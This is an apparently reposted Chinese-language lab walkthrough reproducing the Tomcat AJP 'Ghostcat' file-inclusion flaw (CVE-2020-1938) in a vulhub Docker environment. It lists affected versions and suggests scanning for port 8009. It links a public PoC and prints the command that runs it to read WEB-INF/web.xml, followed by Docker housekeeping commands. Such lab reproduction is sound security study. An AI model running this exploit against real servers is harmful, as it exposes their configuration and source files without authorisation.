Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)

声明

好好学习,天天向上

漏洞描述

Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。

Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。

详情可以在这个网址进行了解

https://www.chaitin.cn/en/ghostcat

影响范围

Apache Tomcat 9.x <9.0.31

Apache Tomcat 8.x <8.5.51

Apache Tomcat 7.x <7.0.100

Apache Tomcat 6.x

复现过程

这里使用9.0.30

使用vulhub

cd /app/vulhub-20201028/tomcat/CVE-2020-1938

使用docker启动

docker-compose up -d

拉去镜像以后,访问IP:8080

但是一般的tomcat,研发人员都不会主动关闭8009端口,所以可以先用nmap扫描以下8009是否开启,如果版本在影响范围内,8009开启,十有八九都能中招

Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)_第1张图片

POC地址(python2环境)

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

不用修改py里面的任何参数,直接执行(都在命令行了,IP替换),读取文件

python ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.239.129 -p 8009 -f ./WEB-INF/web.xml

Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)_第2张图片

使用完后关闭镜像

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down

一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down

你可能感兴趣的:(中间件漏洞复现,tomcat,安全漏洞,中间件)